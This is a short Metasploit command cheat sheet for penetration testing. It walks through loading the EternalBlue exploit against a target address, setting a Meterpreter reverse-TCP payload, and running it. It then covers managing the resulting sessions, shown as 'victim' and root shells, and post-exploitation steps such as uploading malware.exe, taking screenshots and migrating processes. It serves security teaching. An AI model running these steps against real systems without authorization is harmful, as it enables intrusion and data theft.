Metasploit is a powerful framework used for penetration testing and ethical hacking.
This framework is used to identify and exploit vulnerabilities in computer systems. It also provides a platform for developing, testing, and executing exploit code against remote targets.
Below are some common commands and their usage in Metasploit:
Starting Metasploit
Start the Metasploit console:
Command: msfconsole
Basic Commands
1. Search for exploits, payloads, auxiliary modules, etc.:
Command: search <keyword>
Example: search smb
2. Use a specific module:
Command: use <module>
Example: use exploit/windows/smb/ms17_010_eternalblue
3. Show available options for the current module:
Command: show options
4. Set a specific option for the module:
Command: set <option> <value>
Example: set RHOSTS 192.168.1.1
5. Set a payload:
Command: set payload <payload>
Example: set payload windows/meterpreter/reverse_tcp
6. Show payloads compatible with the selected exploit:
Command: show payloads
7. Run the exploit:
Command: exploit
8. Run the exploit in the background:
Command: exploit -j
Managing Sessions
1. List active sessions:
Command: sessions -l
Example output:
msf6 > sessions -l

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  1         meterpreter x86/windows  WIN7\victim @ WIN7-PC  192.168.1.5:4444 -> 192.168.1.101:1234 (192.168.1.101)
  2         shell x86/linux          root @ ubuntu          192.168.1.5:4444 -> 192.168.1.102:5678 (192.168.1.102)

2. Interact with a specific session:
Command: sessions -i <session_id>
Example:
sessions -i 1
3. Kill a specific session:
Command: sessions -k <session_id>
Meterpreter Commands
1. Get a shell on the target machine:
Command: shell
2. List files in the current directory:
Command: ls
3. Change directory:
Command: cd <directory>
4. Upload a file to the target:
Command: upload <local_path> <remote_path>
Example:
upload /home/user/malware.exe C:\\Windows\\Temp\\malware.exe
5. Download a file from the target:
Command: download <remote_path> <local_path>
Example:
download C:\\Windows\\Temp\\malware.exe /home/user/malware.exe
6. Get system information:
Command: sysinfo
7. Take a screenshot:
Command: screenshot
8. Get a list of running processes:
Command: ps
9. Migrate to another process:
Command: migrate <pid>
10. Run a script:
Command: run <script>
Example:
run post/windows/gather/checkvm